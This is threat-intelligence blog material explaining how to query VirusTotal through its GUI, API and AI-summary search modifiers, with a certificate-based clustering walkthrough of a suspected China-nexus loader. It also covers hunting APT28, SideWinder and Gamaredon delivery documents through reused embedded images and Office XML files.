In addition to scoping searches to a specific top-level collection, VirusTotal also uses the entity modifier to disambiguate between search modifiers mapped to more than one collection, such as fs (first submission date). For example, entity:file AND fs:2024-07-15 instructs VirusTotal to search the files collection for file objects where the first_submission_date attribute is set to July 15, 2024. In contrast, entity:url AND fs:2024-07-15 directs VirusTotal to search the urls collection for url objects where first_submission_date is set to the same date.
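The composition rules described in this section can be sketched as a few string helpers. This is only an illustration: the helper names (term, all_of, any_of, negate, scoped) are hypothetical, and the sketch does not check that every modifier in a query maps to the same top-level collection.

```python
def term(modifier: str, value: str) -> str:
    """Format a single search modifier as modifier:value."""
    return f"{modifier}:{value}"


def _group(operator: str, parts: tuple) -> str:
    """Join sub-expressions with a logical operator, parenthesizing groups."""
    if not parts:
        raise ValueError("at least one sub-expression is required")
    if len(parts) == 1:
        return parts[0]
    return "(" + f" {operator} ".join(parts) + ")"


def all_of(*parts: str) -> str:
    return _group("AND", parts)


def any_of(*parts: str) -> str:
    return _group("OR", parts)


def negate(part: str) -> str:
    return f"(NOT {part})"


def scoped(expression: str, entity: str = "file") -> str:
    """Prefix a query with the entity modifier; file mirrors the documented default."""
    return f"entity:{entity} AND {expression}"


# The two first-submission queries from the text differ only in the entity.
file_query = scoped(term("fs", "2024-07-15"))
url_query = scoped(term("fs", "2024-07-15"), entity="url")
```

Keeping the entity as an explicit argument makes the disambiguation visible: the same fs term yields a file search or a URL search depending on the scope.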

The VirusTotal API

A basic way to query VirusTotal using the API is to issue HTTP GET requests to API endpoints exposed by the platform and specify search filters as part of the request URLs. VirusTotal implements multiple endpoints, such as the following:

/api/v3/intelligence/search?query={query}: This endpoint allows querying VirusTotal in the same manner as the GUI, using a value that uniquely identifies a submitted artifact (a URL, domain, IP address, or file hash) or search modifiers. Example request URLs are https://www.virustotal.com/api/v3/intelligence/search?query=test.com and https://www.virustotal.com/api/v3/intelligence/search?query=entity:domain+and+domain:test.
/api/v3/files/{hash}: This endpoint retrieves the file object whose md5, sha1, or sha256 attribute matches the user-provided value. An example request URL is https://www.virustotal.com/api/v3/files/e6adf40a959308ea9de69699c58d2f25.
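As a rough illustration, request URLs for these two endpoints can be assembled with the Python standard library. The helper names are hypothetical, and the x-apikey header is stated here as an assumption about how API v3 requests are authenticated, since the text above does not cover authentication. The sketch only builds the request objects and does not send them.

```python
from urllib.parse import quote, urlencode
from urllib.request import Request

API_BASE = "https://www.virustotal.com/api/v3"


def search_url(query: str) -> str:
    """URL for /intelligence/search with the query percent-encoded."""
    return f"{API_BASE}/intelligence/search?{urlencode({'query': query})}"


def file_url(file_hash: str) -> str:
    """URL for /files/{hash}; accepts an MD5, SHA-1, or SHA-256 value."""
    return f"{API_BASE}/files/{quote(file_hash, safe='')}"


def build_request(url: str, api_key: str) -> Request:
    """Prepare (but do not send) a GET request carrying the API key."""
    # Assumption: the key is passed in an x-apikey header.
    return Request(url, headers={"x-apikey": api_key, "accept": "application/json"})


request = build_request(file_url("e6adf40a959308ea9de69699c58d2f25"), "YOUR_API_KEY")
```

Note that urlencode escapes the colon in modifiers (entity:domain becomes entity%3Adomain) and turns spaces into plus signs, which is an equivalent encoding of the example search URL shown above. Sending the request, for example with urllib.request.urlopen, requires a valid API key.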

Querying using the /api/v3/files/{hash} API endpoint

VirusTotal returns JSON-formatted data in response to API requests. Users can parse this data and use it for additional actions, such as further querying and pivoting through the VirusTotal dataset.

Web requests can be issued using various methods, such as HTTP client libraries, command-line tools, or custom scripts. vt-py, the official Python library for the VirusTotal API, simplifies the process of sending web requests to endpoints and handling the responses, enabling users to perform various tasks programmatically.

The API vs. The GUI

There are several key differences between the VirusTotal GUI and API, particularly regarding scalability and the scope of available information.

The programmatic use of the API enables users to conduct large-scale querying of VirusTotal, which is not achievable through manual use of the GUI. For example, retrieving the names of the processes started by all Windows Shortcut files submitted to VirusTotal throughout 2024 is a task that is practically feasible only using the API.

Further, not all data stored in the VirusTotal dataset can be used as part of search queries using the GUI, which limits its querying capacity. For example, there are no search modifiers allowing users to query for URLs constructed in process memory during sandbox execution that submitted files have not contacted, such as secondary C2 URLs, which are contacted if communication with the primary C2 server fails. Although such search modifiers can be useful during investigations, the VirusTotal GUI displays these URLs in the Memory pattern URLs section of web analysis reports without providing a method to query for them directly.

The API endpoint /api/v3/files/{hash}/behaviours retrieves sandbox-generated data for files specified by their hash value. URLs discovered in process memory are stored in the memory_pattern_urls field returned by the endpoint. For files that meet other search criteria, users can programmatically extract the URLs and keep the file in consideration if a URL aligns with a specific search requirement.
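The extraction step described above might look like the following sketch, which works on an already-parsed JSON response. It assumes the response wraps one report per sandbox in a top-level data list with the fields under attributes; only the memory_pattern_urls field name comes from the text, and the sample response uses placeholder URLs.

```python
from typing import Any


def memory_pattern_urls(behaviours_response: dict[str, Any]) -> set[str]:
    """Collect memory pattern URLs across all sandbox reports in a response."""
    urls: set[str] = set()
    # Assumed layout: {"data": [{"attributes": {"memory_pattern_urls": [...]}}]}
    for report in behaviours_response.get("data", []):
        attributes = report.get("attributes", {})
        urls.update(attributes.get("memory_pattern_urls", []))
    return urls


def keep_file(behaviours_response: dict[str, Any], needle: str) -> bool:
    """Keep a file in consideration if any memory pattern URL contains needle."""
    return any(needle in url for url in memory_pattern_urls(behaviours_response))


# Placeholder response with made-up URLs, for illustration only.
sample_response = {
    "data": [
        {"attributes": {"memory_pattern_urls": ["http://c2.example.net/gate"]}},
        {"attributes": {"processes_created": ["cmd.exe"]}},
    ]
}
```

With this sample, keep_file(sample_response, "example.net") is true, while a file whose reports contain no matching URL would be dropped from the candidate set.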

memory_pattern_urls values

The API may provide more information than what is visible to users in the GUI. In particular, there can be discrepancies between the sandbox-generated data provided through the GUI and through the API. For example, the /api/v3/files/{hash}/behaviours endpoint retrieves all data generated by the CAPE sandbox for the file with the user-specified hash, including details on the suspicious behavior rules triggered by the file during execution. This information is not provided to users in the GUI.

CAPE suspicious behavior rules retrieved by /api/v3/files/{hash}/behaviours

AI Search Modifiers

VirusTotal leverages artificial intelligence (AI) to generate natural language summaries of the functionalities of code in executable files submitted to the platform, such as scripts, Microsoft Office documents, or binary files. This feature is particularly beneficial for malware analysis, assisting analysts in understanding the capabilities of malware under investigation.

VirusTotal integrates AI engines into its pipeline for analyzing submitted files. These engines use large language models (LLMs) trained on programming languages, which enable them to analyze and translate code into natural language summaries of its functionalities. Some AI engines also generate verdicts, which are labels categorizing analyzed code as benign, suspicious, or malicious. VirusTotal supports two types of engines: Code Insight and Crowdsourced AI.

Code Insight is VirusTotal's in-house AI engine implementation, based on Google’s Gemini. Crowdsourced AI is a collection of third-party AI engines contributed by the community and is continuously enriched with new additions.

Depending on their training and design, the AI engines specialize in analyzing specific file types. For example, the ByteDefend AI engine is designed to analyze macro code in Microsoft Office files, including Word, Excel, and PowerPoint documents.

The Code Insight engine focuses on script files, such as PowerShell, Python, and Ruby scripts. It excludes from analysis any script files that exceed a set file size or similarity threshold (these values are currently undocumented). The VirusTotal platform compares each script's code with scripts previously analyzed by the AI engine and calculates a similarity value. This value is then evaluated against the similarity threshold.

While we were writing this post, Google announced that Code Insight will also support Windows Portable Executable (PE) binary files. This feature is enabled by three interconnected phases:

Unpacking binaries using the malware analysis service Mandiant Backscatter: This step reveals the underlying code of potentially obfuscated (packed) malicious binaries submitted to VirusTotal, which is the intended subject of analysis.
Decompilation of the unpacked binaries using Hex-Rays IDA Pro decompilers: This step translates the assembly code of the unpacked binaries into decompiled code written in a higher-level programming language (pseudocode). Gemini analyzes decompiled code with greater efficiency compared to assembly code due to its conciseness.
Analysis of the decompiled code with Gemini: This step generates a natural language summary of the decompiled code’s functionalities.

The Code Insight analysis workflow

The summaries generated by Code Insight and Crowdsourced AI engines for a given file are stored in the analysis fields of the crowdsourced_ai_results attribute of the corresponding object of type file. The optional verdict fields of this attribute store the verdicts, while the source fields indicate the AI engines that have analyzed the code within the file.
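A short sketch of reading this attribute from a parsed file object follows. It assumes crowdsourced_ai_results is a list of entries, each carrying the analysis, source, and optional verdict fields named above; the engine identifiers and summaries in the sample are placeholders rather than real output.

```python
from typing import Any, Optional


def ai_summaries(
    file_attributes: dict[str, Any],
    source: Optional[str] = None,
    verdict: Optional[str] = None,
) -> list[str]:
    """Return AI-generated summaries, optionally filtered by engine or verdict."""
    summaries = []
    for entry in file_attributes.get("crowdsourced_ai_results", []):
        if source is not None and entry.get("source") != source:
            continue
        # The verdict field is optional, so a missing verdict never matches a filter.
        if verdict is not None and entry.get("verdict") != verdict:
            continue
        summaries.append(entry.get("analysis", ""))
    return summaries


# Placeholder attributes; engine names and summaries are invented for illustration.
sample_attributes = {
    "crowdsourced_ai_results": [
        {"source": "engine_a", "analysis": "Downloads and runs a payload.", "verdict": "malicious"},
        {"source": "engine_b", "analysis": "Formats a spreadsheet."},
    ]
}
```

Filtering on source corresponds to what the engine-specific search modifiers do on the platform side, while leaving both filters unset returns every summary stored for the file.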

The crowdsourced_ai_results attribute

Users can query VirusTotal for specific verdicts or content in AI-generated summaries using search modifiers designed for that purpose. These modifiers are mapped to the files top-level collection.

For each AI search modifier, VirusTotal searches the platform’s dataset for file objects whose analysis and/or verdict fields of the crowdsourced_ai_results attribute meet the user-specified criterion. In addition, based on the source field, each AI search modifier focuses the search on summaries or verdicts generated by either Code Insight, specific Crowdsourced AI engines, or all available AI engines.

Search modifier	Usage and search scope
codeinsight	codeinsight:[text] Searches for text in summaries generated by Code Insight.
crowdsourced_ai_analysis	crowdsourced_ai_analysis:[text] Searches for text in summaries generated by Code Insight and all Crowdsourced AI engines.
crowdsourced_ai_verdict	crowdsourced_ai_verdict:[benign|suspicious|malicious] Searches for benign, suspicious, or malicious verdicts generated by Code Insight and all Crowdsourced AI engines.
[ENGINE]_ai_analysis	[ENGINE]_ai_analysis:[text] Searches for text in summaries generated by a single Crowdsourced AI engine. [ENGINE] is the identifier for a specific engine, such as hispasec (hispasec_ai_analysis).
[ENGINE]_ai_verdict	[ENGINE]_ai_verdict:[benign|suspicious|malicious] Searches for benign, suspicious, or malicious verdicts generated by a single Crowdsourced AI engine.

VirusTotal introduces new engine-specific search modifiers ([ENGINE]_ai_analysis and [ENGINE]_ai_verdict) as new engines are incorporated into Crowdsourced AI. For example, with the addition of the ByteDefend engine, the platform released two new search modifiers: bytedefend_ai_analysis and bytedefend_ai_verdict.

The AI search modifiers can be combined with other AI search modifiers or with any other modifiers supported by VirusTotal using the logical operators AND, OR, and NOT. For example, the search query crowdsourced_ai_analysis:"inject" AND crowdsourced_ai_analysis:"explorer.exe" can be used to identify files that perform injection involving the explorer.exe process. The results returned from VirusTotal include the PowerShell script da.ps1, which injects code from an external file into this process. This functionality of the script is documented in the summary generated by the Code Insight AI engine.

da.ps1 injects code into explorer.exe

Code Insight analysis of da.ps1

Another example is the search query crowdsourced_ai_analysis:"Shell.Run" AND behavior_created_processes:"powershell.exe". This query can be used to identify files that invoke the Run function of the Windows Script Host Shell object to execute the PowerShell process powershell.exe for conducting further activities. The results returned from VirusTotal include the Visual Basic script 297641663, which executes a PowerShell command using the Run function to download a payload from a remote server.

297641663 executes powershell.exe

Code Insight analysis of 297641663

Although the AI engines integrated into VirusTotal provide valuable insights, they should be used as tools to assist in malware analysis efforts, as part of a broader analysis strategy. AI engines are designed and trained to analyze code based on historical data, and therefore may not always accurately interpret novel techniques or highly obfuscated code in malware implementations. As a result, the summaries they generate may sometimes lack sufficient or useful information for analysts.

Clustering With Search Modifiers

The extensive number of VirusTotal search modifiers enables analysts to query the platform in a practical and precise way. This allows for retrieving submitted artifacts and related information that are relevant to specific threats under investigation. However, false positives (where retrieved data is not related to the investigated threat) and false negatives (where relevant data is missing) can impact the relevance and completeness of search results.

The way in which queries are formulated is important for addressing or alleviating the impact of these challenges. Combining search modifiers using the logical operators AND, OR, and NOT and refining search queries helps reduce the likelihood of false positives and false negatives. This is an iterative process where analysts may integrate information obtained from multiple sources into their query formulations.

For example, malware analysis may provide characteristics suspected to be unique to the investigated activity cluster, such as specific file names, hashes, registry keys, network indicators, code signatures, strings or functions used by the malware, or distinct patterns of behavior. Additionally, information from previous reports documenting activities potentially related to the current investigation can also be beneficial. Upon reviewing the accuracy and completeness of query results, analysts may adjust the queries to further improve their relevance and precision. To illustrate these concepts, we provide an example from an actual threat research investigation.

Clustering Scenario

In 2023, SentinelLabs conducted an investigation into suspected China-nexus actors targeting Southeast Asian gambling companies. The investigation led to the AdventureQuest.exe Windows PE executable, which had been submitted to VirusTotal on May 11, 2023. Analysis of the file revealed it to be a malware loader implemented using the .NET framework, deploying further executables on compromised systems. These executables download archive files from attacker-controlled servers. The archives contain sideloading capabilities, including malicious DLLs sideloaded by legitimate executables to deploy the Cobalt Strike backdoor.

AdventureQuest.exe is signed with a certificate issued to the Ivacy VPN vendor PMG PTE LTD (certificate serial number: 0E3E037C57A5447295669A3DB1A28B8A). It is probable that the PMG PTE LTD signing key has been stolen, a tactic often used by suspected Chinese threat actors to sign their malware. Based on overlaps in code and functionalities with malware observed in Operation ChattyGoblin, AdventureQuest.exe is likely part of the same activity cluster.

The certificate’s serial number provides a starting point for identifying any other malware loaders submitted to VirusTotal that are signed with the same certificate and share implementation characteristics with AdventureQuest.exe, suggesting a potential link to the same threat actor or campaign.

VirusTotal uses the Sigcheck tool to extract digital signature information from submitted Windows PE files, including the serial numbers of code signing certificates. After extraction, this information is stored in the signature_info attribute of the corresponding file objects. Users can query VirusTotal for specific signature information using the signature search modifier.

The signature_info attribute (in the file object for AdventureQuest.exe)

The signature_info attribute (in the web analysis report for AdventureQuest.exe)

The query signature: "0E3E037C57A5447295669A3DB1A28B8A" searches for submitted files that have the serial number 0E3E037C57A5447295669A3DB1A28B8A in their signature information. The query returns 94 results, including both Windows PE executables like AdventureQuest.exe and other file types, such as Windows DLLs.

VirusTotal attempts to determine the type of each submitted file using third-party tools that search for magic numbers (byte sequences) and other types of signatures that identify specific file types, such as 0x4D 0x5A for Windows PE executables. These tools include the Unix utility file, Detect-it-Easy, and AI engines. The platform then inserts keywords indicating the file type in the type_tags attribute of the corresponding file object. Users can query VirusTotal for specific keywords stored in type_tags using the type search modifier.

The type_tags attribute (in the file object for AdventureQuest.exe)

The type_tags attribute (in the web analysis report for AdventureQuest.exe)

Building on the previous search, the query signature: "0E3E037C57A5447295669A3DB1A28B8A" AND type:"peexe" narrows the results to submitted Windows PE executables. The query returns 31 results, some of which, like AdventureQuest.exe, are implemented using the .NET framework, while others are not.

The file and Detect-it-Easy tools may provide VirusTotal with information about the environments in which submitted executables are built. The platform stores the output from these tools in the magic and detectiteasy attributes of the corresponding file objects. Users can query VirusTotal for specific content in these attributes using the magic and detectiteasy search modifiers.

The magic attribute (in the file object for AdventureQuest.exe)

The magic attribute (in the web analysis report for AdventureQuest.exe)

The detectiteasy attribute (in the file object for AdventureQuest.exe)

The detectiteasy attribute (in the web analysis report for AdventureQuest.exe)

Building on the previous search, the query signature: "0E3E037C57A5447295669A3DB1A28B8A" AND type:"peexe" AND magic:".NET" further narrows the results to submitted executables built using the .NET framework. The query returns 13 results.

Closer examination of the resulting files shows that most have PDB paths, such as Ivacy.pdb. However, AdventureQuest.exe does not have a PDB path, which is typical for malware, as malware authors often strip executables of debug information. This suggests that the files with PDB paths may not be associated with the investigated activity.

VirusTotal extracts information from the header of each submitted Windows PE executable and stores this information in the pe_info attribute of the corresponding file object. Users can query VirusTotal for specific content in this attribute using the metadata search modifier.

The pe_info attribute (in the file object for AdventureQuest.exe)

Further, the resulting files with PDB paths had been residing at file paths in the Ivacy VPN installation directory, such as C:\Program Files (x86)\Ivacy\IvacyService.exe. For each submitted file, VirusTotal records the names under which the file has been submitted, which may be full file paths rather than just filenames. The platform stores this information in the names attribute of the corresponding file object. Users can query VirusTotal for specific content in this attribute using the name search modifier.

The names attribute (in the file object for AdventureQuest.exe)

The names attribute (in the web analysis report for AdventureQuest.exe)

Based on our insights and previous research on Operation ChattyGoblin, we know that the threat actors do not disguise their malware as Ivacy VPN components. This suggests that the files that had been located in the Ivacy VPN installation directory before submission to VirusTotal may be false positives. An analysis of some of these files using a .NET decompiler revealed that they are indeed legitimate Ivacy VPN components.

Building on the previous search, the query signature:"0E3E037C57A5447295669A3DB1A28B8A" AND type:"peexe" AND magic:".NET" AND (NOT metadata:".pdb") AND (NOT name:"Program Files (x86)\ivacy") further narrows the results to submitted executables that do not have PDB paths and had not been located in the Ivacy VPN installation directory before submission. The query returns one result, AdventureQuest.exe.
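The iterative narrowing in this scenario can be summarized as a list of refinements that are appended one step at a time. The sketch below only builds the query strings; the variable and function names are illustrative, the type modifier is used throughout as in the earlier steps, and the result counts in the comments are the ones reported in the text at the time of the investigation.

```python
SERIAL = "0E3E037C57A5447295669A3DB1A28B8A"

# Each entry is the refinement added at one step of the investigation.
REFINEMENTS = [
    f'signature:"{SERIAL}"',  # 94 results: all files signed with the certificate
    'type:"peexe"',           # 31 results: Windows PE executables only
    'magic:".NET"',           # 13 results: built using the .NET framework
    # 1 result: no PDB path and not submitted from the Ivacy install directory
    r'(NOT metadata:".pdb") AND (NOT name:"Program Files (x86)\ivacy")',
]


def progressive_queries(refinements: list[str]) -> list[str]:
    """Return the cumulative query after each refinement step."""
    return [" AND ".join(refinements[: step + 1]) for step in range(len(refinements))]


for query in progressive_queries(REFINEMENTS):
    print(query)
```

Keeping the refinements in a list makes it easy to drop or reorder a step when a filter turns out to exclude relevant files, which is the kind of adjustment the iterative process calls for.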

This suggests that VirusTotal does not host other malware loaders that are signed with the same certificate as AdventureQuest.exe and are likely linked to the investigated threat cluster. However, the extensive number of VirusTotal search modifiers allows for the identification of such loaders based on characteristics beyond the code signing certificate used. For example, querying VirusTotal for a code segment specific to AdventureQuest.exe using the content modifier leads to further malware that is likely part of the same activity cluster. We leave this as an exercise for the reader.

Search queries and results

Clustering With Search Modifiers | Limitations

Certain aspects of how VirusTotal collects information on submitted artifacts, which users can query using search modifiers, may increase the likelihood of missing relevant findings in some search scenarios. This is particularly relevant given the third-party tools and functionalities that VirusTotal uses for collecting this information, such as sandboxes and detection engines. Each of these tools has specific limitations, which affect the quality and quantity of information VirusTotal collects and stores in its dataset. In this section, we highlight some of these limitations to help users understand how they impact querying VirusTotal with search modifiers.

As mentioned earlier, VirusTotal executes submitted executable files (executables and scripts) in sandboxes to capture behaviors and artifacts visible only during execution. Additionally, most of the sandboxes VirusTotal integrates can identify MITRE ATT&CK techniques exhibited during execution. This is accomplished through a set of rules that map observed behaviors to MITRE ATT&CK techniques.

For each submitted file, the sandboxes generate a report documenting captured activities, which is accessible to VirusTotal users. To facilitate systematic searching of sandbox-generated data, VirusTotal stores this data in an object of type file_behaviour. This object has a relationship to the file object that is directly related to the submitted file. Users can query sandbox-generated data using a variety of search modifiers, such as behavior_created_processes (searches for a name of a created process), behavior_files (searches for a name or path of an opened, written, deleted, or dropped file), or attack_technique (searches for a MITRE ATT&CK technique ID).

Sandbox-generated data in a file_behaviour object

VirusTotal’s sandboxes may not always capture relevant behaviors of executable files, for example, because of execution conditions that must be met or techniques that malware authors intentionally implement to evade sandbox analysis. Execution conditions include required command-line parameters, library or platform dependencies, and external configuration or data files. In contrast to private submissions, VirusTotal automatically executes the vast volume of executable files continuously submitted to the platform's public corpus in sandboxes, without customizing their execution or execution environments. As a result, search queries with modifiers applied to sandbox-generated data, like behavior_files or attack_technique, may return incomplete results.

For example, the BlackCat ransomware requires operators to provide an execution password as a command-line parameter (referred to as an 'access token') for the malware to initiate encryption. For the BlackCat sample veros3.exe, the CAPE sandbox has not captured any file system activities, such as deleting, creating, or modifying files. When the correct access token is provided, this sample enumerates the files and folders on the filesystem of a compromised system and encrypts files as specified in embedded configuration data.

The CAPE sandbox report for veros3.exe

In addition to running executable files in sandboxes to capture their behaviors, VirusTotal is capable of extracting malware configurations from these files. To achieve this, the platform uses the Mandiant Backscatter malware analysis service, which implements configuration extraction modules to automatically extract configurations based on known implementation patterns. Users can search through extracted configuration data using the malware_config search modifier. However, the automated extraction might not work when the analyzed malware uses new or changed methods for storing its configuration data, which are not covered by the existing modules. As a result, search queries involving malware_config may return incomplete results.

It is also important to note that some information related to submitted artifacts may change over time. For example, the last_analysis_stats attribute of the file object stores the number of third-party detection engines that have labeled the corresponding submitted file as malicious. Users can use the positives search modifier to narrow searches based on whether this number is less than, greater than, or equal to a user-specified value. For example, positives:20+ narrows searches to files that have been labeled as malicious by 20 or more engines.
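The same check can be reproduced locally on a retrieved file object, which is useful when re-evaluating files whose detection counts have changed since an earlier search. The sketch below assumes that the count is stored under a malicious key inside last_analysis_stats and that the trailing plus sign is inclusive (at least the given number); both are assumptions to verify against the official documentation, and the sample values are made up.

```python
from typing import Any


def positives(last_analysis_stats: dict[str, Any]) -> int:
    """Number of engines that labeled the file as malicious (assumed key name)."""
    return int(last_analysis_stats.get("malicious", 0))


def meets_positives(last_analysis_stats: dict[str, Any], minimum: int) -> bool:
    """Local counterpart of positives:N+, assuming the threshold is inclusive."""
    return positives(last_analysis_stats) >= minimum


# Made-up snapshots of the same file at two points in time.
early_stats = {"malicious": 7, "undetected": 60}
later_stats = {"malicious": 53, "undetected": 14}
```

A file that fails meets_positives(early_stats, 20) may pass the same check later, which is why results of positives-based searches are best treated as a snapshot.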

last_analysis_stats attribute

Setting positives to a relatively high number is a way to focus searches on files that are likely to be malicious. However, the returned results may not include malicious files for which an insufficient number of third-party detection engines have developed detections. The development of detections is fully under the control of the engines' vendors and may depend on a variety of factors.

A common factor prompting vendors to develop a detection for a specific malware implementation is the public release of a threat research report listing files that implement the malware. For example, on September 21, 2023, SentinelLabs released a report on the Sandman APT group, identifying the UpdateCheck.dll file as malware used by this group. Prior to this date, on March 15, 22, and 29, 2023, the number of engines detecting the file as malware was 5, 6, and 7, respectively. Shortly after the release of the report, this number spiked to 17 and reached 53 by September 29, 2023.

Number of engines detecting the UpdateCheck.dll malware

Conclusions

Effectively using VirusTotal for threat research requires a good understanding of the platform’s wide range of querying capabilities, the scenarios in which these capabilities return informative results beneficial to investigations, and the factors that may impact the completeness or relevance of the data returned.

While the GUI provides an agile and user-friendly way to query VirusTotal, the API enables large-scale querying, offers expanded querying capabilities, and allows for retrieving more extensive information. Additionally, the AI engines that VirusTotal integrates can significantly speed up malware analysis efforts; however, their outputs should be considered as part of a broader analysis strategy as they may lack sufficient or useful information due to limitations in design or training data. Moreover, the extensive set of search modifiers provides flexible search capabilities, but the relevance and completeness of results can be impacted by false positives and false negatives.

SentinelLabs and VirusTotal are committed to sharing information and insights that help new users gain a solid understanding of the platform’s capabilities, enabling them to make full use of the available VirusTotal features and conduct thorough investigations.

VirusTotal Blog
Tracking Threat Actors Using Images and Artifacts 29 May 2024 at 10:00

Tracking Threat Actors Using Images and Artifacts

By: Joseliyo Sánchez

When tracking adversaries, we commonly focus on the malware they employ in the final stages of the kill chain and infrastructure, often overlooking samples used in the initial ones.

In this post, we will explore some ideas to track adversary activity leveraging images and artifacts mostly used during delivery. We presented this approach at the FIRST CTI in Berlin and at Botconf in Nice.

Hunting early

In threat hunting and detection engineering activities, analysts typically focus heavily on the latter stages of the kill chain – from execution to actions on objectives (Figure 1). This is mainly because there is more information available about adversaries in these phases, and it's easier to search for clues using endpoint detection and response (EDR), security information and event management (SIEM), and other solutions.

Figure 1: Stages of the kill chain categorized by their emphasis on threat hunting and detection engineering.

We have been exploring ideas to improve our hunting for samples built in the weaponization phase and distributed in the delivery phase, concentrating on the detection of suspicious Microsoft Office documents (Word, Excel, and PowerPoint), PDF files, and emails.

In threat intelligence platforms and cybersecurity in general, green and red colors are commonly used to quickly indicate results and identify whether or not something is malicious. This is because they are perceived as representing good or bad, respectively.

Multiple studies in psychology have demonstrated how colors can influence our decision-making process. VirusTotal, through the third-party engines integrated into it, shows users when something is detected and therefore deemed "malicious," and when something is not detected and considered "benign."

For example, the sample in Figure 2 belongs to a Microsoft Word document distributed by the SideWinder group during the year 2024.

Figure 2: Document used by the SideWinder APT group

The sample in question was identified at the time of writing this post by 31 antivirus engines, leaving no doubt that it is indeed a real malware sample. In the process of pivoting to identify new samples or related infrastructure, starting with Figure 2, the analyst will likely click on the URL detected by 11 out of the 91 engines, and the domains detected by 17 and 15 engines, respectively, to see if there are other samples communicating with them. The remaining two domains (related to windows.com and live.com) in this case are easily identified as legitimate domains that were likely contacted by the sandbox during its execution.

Figure 3: Relationships within the SideWinder APT group document

Further down in the VirusTotal report for the same sample (Figure 3), the analyst will likely click on the ZIP file listed as "compressed parent" to check if there are other samples within this ZIP besides the current one. They may also click on the XML file detected by 8 engines, and the LNK file detected by 4 engines. The remaining files in the bundled files section probably won't be clicked, as the green color indicates they are not malicious, and also because they have less enticing formats, mainly XML and JPEG. But what if we explore them?

XML files generated by Microsoft Office

When you create a new Microsoft Office file, it automatically generates a series of embedded XML files containing information about the document. Additionally, if you use images in the document, they are also embedded within it. Microsoft Office files are compressed files (similar to ZIP files). In VirusTotal, when a Microsoft Word file is uploaded, you can see all these embedded files in the embedded files section.

We have mainly focused on three types of embedded files within Office documents:

Images: Many threat actors use images related to the organizations or entities they intend to impersonate. They do this to make documents appear legitimate and gain the trust of their victims.
[Content_Types].xml: This file specifies the content types and relationships within the Office Open XML (OOXML) document. It essentially defines the types of content and how they are organized within the file structure.
styles.xml: Stores stylistic definitions for your document. These styles provide consistent formatting instructions for fonts, paragraph spacing, colors, numbering, lists, and much more.

Our hypothesis is: if malicious Microsoft Word documents are copied and pasted during the weaponization phase, with only the content being modified, the hashes of the [Content_Types].xml and styles.xml files will likely remain the same.
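The hypothesis can be checked locally on two documents by hashing their embedded files, since OOXML documents are ZIP archives. The following is a minimal sketch using the Python standard library; the function names are illustrative, and the paths word/styles.xml and word/media/ are the usual locations in Word documents, stated here as an assumption (Excel and PowerPoint files use different directory names).

```python
import hashlib
import zipfile

TRACKED_NAMES = ("[Content_Types].xml", "word/styles.xml")
TRACKED_PREFIXES = ("word/media/",)  # embedded images in Word documents


def embedded_hashes(docx) -> dict[str, str]:
    """Map tracked member names of an OOXML file to their SHA-256 digests.

    docx may be a file path or a binary file-like object.
    """
    hashes = {}
    with zipfile.ZipFile(docx) as archive:
        for name in archive.namelist():
            if name in TRACKED_NAMES or name.startswith(TRACKED_PREFIXES):
                hashes[name] = hashlib.sha256(archive.read(name)).hexdigest()
    return hashes


def shared_members(first, second) -> list[str]:
    """Names of tracked members in first whose content also appears in second."""
    second_digests = set(embedded_hashes(second).values())
    return sorted(
        name
        for name, digest in embedded_hashes(first).items()
        if digest in second_digests
    )
```

Comparing by digest rather than by member name means a reused image is still matched when it has been renamed inside the second document. The resulting digests can then be used as pivots, for example by looking up each one as a file hash.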

Office documents

To check our hypothesis, we selected a set of samples used during delivery and belonging to the threat actors listed in Figure 4:

Figure 4: Number of samples per actor within the scope

Let’s analyze some of the results we obtained per actor.

APT28 – Images

We started by focusing on images APT28 has reused for different delivery samples (Figure 5).

Figure 5: Images shared in multiple documents by APT28

Each line in the Figure 5 graph represents the same image, and each point represents at least two samples that used that particular image.

The second image of the graph shows how it was used by different Office documents at different points in time, from 2018 to 2022 (dates related to their upload to VirusTotal).

Now, the chart in Figure 6 visualizes each of these images.

Figure 6: Content of the images shared in multiple documents by APT28

The first image is just a simple line with no particular meaning. It's embedded in over 100 files known by VirusTotal.
The second image is a hand and has 14 compressed parents.
The third image consists of black circles and also has over 100 compressed parents.
The last image resembles a Word page with a table, presenting a fake EDA Roadmap of the European Commission. The image format is EMF (an old format) and it has 4 compressed parents.

If we delve into the compressed parents of the second image (the one with the hand), we can see how the image is used in Office documents that are part of a campaign reported by Mandiant attributed to APT28. The image of the hand was used in fake Word documents for hotel reservations, particularly in a small section where the client was supposed to sign.

Figure 7: Pivoting through a specific image used by APT28

SideWinder – Images

SideWinder (aka RAZOR TIGER) is a group focused on carrying out operations against military targets in Pakistan. This group has traditionally reused images, which might help in monitoring its activity.

Figure 8: Images shared in multiple documents by RAZOR TIGER

In particular, the image in Figure 9 was used in a sample uploaded in September 2021 and in a second one uploaded in March 2022. The image in question is the signature of Baber Bilal Haider.

Figure 9: Two different samples of RAZOR TIGER share the same image of a handwritten signature

Gamaredon – [Content_Types].xml and styles.xml

For Gamaredon, we found that they reused styles.xml and [Content_Types].xml in different documents, which helped reveal new samples.

The chart in Figure 10 displays all the [Content_Types].xml files from Gamaredon's Office documents.

Figure 10: [Content_Types].xml shared in multiple documents by Gamaredon Group

There are a large number of samples that share the same [Content_Types].xml. It's important to highlight that these [Content_Types].xml files are not necessarily exclusively used by Gamaredon, and can be found in other legitimate files created by users worldwide. However, some of these [Content_Types].xml might be interesting to monitor.

Styles.xml files are usually less generic, which should make them a better candidate to monitor:

Figure 11: Styles.xml shared in multiple documents by Gamaredon Group

We see that styles.xml files are reused less often than [Content_Types].xml. This could be because some of the samples used by this actor for distribution are created from scratch or by reusing legitimate documents.

We used patterns identified in the styles.xml files to launch a retrohunt on VirusTotal. Figure 12 visually represents the original set of styles.xml files (left) and those that were added later after running the retrohunt (right).

Figure 12: Initial graph of the styles.xml and its parents used by Gamaredon (left). Final graph after identifying new styles.xml and their parents using retrohunt in VirusTotal (right)

One of the new styles.xml files found in our retrohunt has 17 compressed parents, meaning it was included in 17 Office files.

Figure 13: Number of parent documents for a specific styles.xml file used by Gamaredon

All the parents were malicious, some of them identical and the rest very similar to one another. The content of many of them referred to "Foreign institutions of Ukraine - Embassy of Ukraine in Hungary," containing a table with phone numbers and information about the embassy, such as social media links and email accounts. Here's an example:

Figure 14: Document used by Gamaredon in one of its campaigns that includes multiple images which can be used to monitor new samples

The social media information includes the logos of these platforms, such as the Facebook logo, the Skype logo, an image of a telephone, etc. By pivoting on the image of the Facebook icon, we find that it has 12 additional compressed parents, meaning it appears in 12 documents, all of them sharing the same styles.xml file.

